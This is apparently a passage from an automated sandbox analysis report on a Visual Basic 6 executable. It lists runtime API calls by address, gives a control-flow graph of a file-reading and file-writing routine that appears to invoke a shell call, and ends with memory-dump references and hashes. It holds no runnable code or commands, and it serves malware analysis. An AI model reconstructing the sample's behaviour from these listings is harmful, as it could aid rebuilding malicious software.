                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082DF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082F3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408300
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408310
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408328
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408343
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040834A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408355
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408362
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408376
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040838E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004083A8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004083AF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004083BA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004083C7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004083DB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004083F3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408407
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408414
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408424
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040843C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408457
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040845E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408469
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408476
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040848A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004084A2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004084BD
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004084C4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004084CF
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004084DC
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004084F0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408508
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0040851C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408529
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408539
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408556
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408561
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 0040856D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408578
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408586
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408591
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408598
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004085A3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004085B0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004085C8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004085E0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004085F4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408601
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408611
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040862F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040863A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408646
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408651
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040865E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408669
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408670
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040867B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408688
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004086A0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004086B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004086D3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004086DA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004086E5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004086F2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408706
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040871E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408739
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408740
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040874B
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408752
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040875D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040876A
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408782
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040879A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004087AE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004087BB
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004087CB
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                                                    • Part of subcall function 004125A0: #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                                                    • Part of subcall function 004125A0: #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                                                    • Part of subcall function 004125A0: #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                                                    • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                                                    • Part of subcall function 004125A0: #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 004087F5
                                                                                                                                                                                  • #669.MSVBVM60 ref: 00408802
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040880D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040881A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00408823
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040883C
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00405B3C,?), ref: 00408855
                                                                                                                                                                                  • __vbaEnd.MSVBVM60(80000002,00000000,00000000,00000000,80000002,00000000,00000000,00000000), ref: 004088B0
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00405E88,?), ref: 004088CE
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B078,00000000), ref: 00408931
                                                                                                                                                                                  • #600.MSVBVM60(00004008,00000000,00000000), ref: 0040895B
                                                                                                                                                                                  • __vbaEnd.MSVBVM60 ref: 0040896E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408A41
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408A5B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408A62
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408A6D
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408A7A
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408A8E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408AA6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408AC1
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00408AC8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408AD3
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408ADA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408AE5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408AF2
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408B0A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B22
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408B36
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B43
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B53
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B6B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408B7F
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408B8C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B9C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BB4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408BC8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BD5
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408BE5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408BFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408C11
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C1E
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C46
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Copy$Free$List$CheckHresult$ErrorNew2$#517$Bstr$#516#631AnsiChkstkSystemUnicode$File$#525#537#570#580#600#616#618#648#669Get3OpenSeek
                                                                                                                                                                                  • String ID: ;$MGH+$2
                                                                                                                                                                                  • API String ID: 2419524798-2363849171
                                                                                                                                                                                  • Opcode ID: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                                                  • Instruction ID: 93bf0c189370be62b4749cd89f90093835801c62d3816994bc11815577fef7f0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
                                                                                                                                                                                  • Instruction Fuzzy Hash: 59B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00411590 Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 343 411590-41167e __vbaChkstk __vbaStrCopy * 3 __vbaOnError #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 #570 __vbaLenBstr 344 411684-411687 343->344 345 411cff-411d05 __vbaErrorOverflow 343->345 344->345 346 41168d-41169b 344->346 347 4116a1-411770 __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 __vbaStrCopy call 40ee70 __vbaStrMove call 40ee70 __vbaStrMove __vbaStrCmp __vbaFreeStrList 346->347 348 41179f-4117b6 __vbaI2I4 __vbaFileClose 346->348 355 411781-411798 __vbaI2I4 __vbaFileClose 347->355 356 411772-4117c8 347->356 350 411c91-411ce7 __vbaFreeStr * 5 348->350 355->350 356->345 359 4117ce-411816 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 356->359 359->345 360 41181c-41181f 359->360 360->345 361 411825-4118d3 __vbaI2I4 __vbaFileSeek call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 360->361 364 4118d9-4118e6 361->364 365 4119d6-411acb __vbaI2I4 __vbaFileClose call 40fba0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 __vbaFileClose #580 __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 364->365 366 4118ec-4118f9 364->366 374 411ad1-411ade 365->374 366->345 367 4118ff-411905 366->367 369 411907-411951 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 367->369 370 41195c-411969 367->370 369->345 372 411957-41195a 369->372 370->345 373 41196f-411972 370->373 375 4119d1 372->375 373->345 376 411978-4119cb #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 373->376 377 411ae4-411af1 374->377 378 411bdb-411c8b __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStr __vbaFreeVar #600 374->378 375->364 376->375 377->345 379 411af7-411afd 377->379 378->350 380 411b54-411b61 379->380 381 411aff-411b49 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 379->381 380->345 383 411b67-411b6a 380->383 381->345 382 411b4f-411b52 381->382 384 411bc9-411bd6 #598 382->384 383->345 385 411b70-411bc3 #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 383->385 384->374 385->384
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,00000000,00000000), ref: 004115AE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                                                  • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
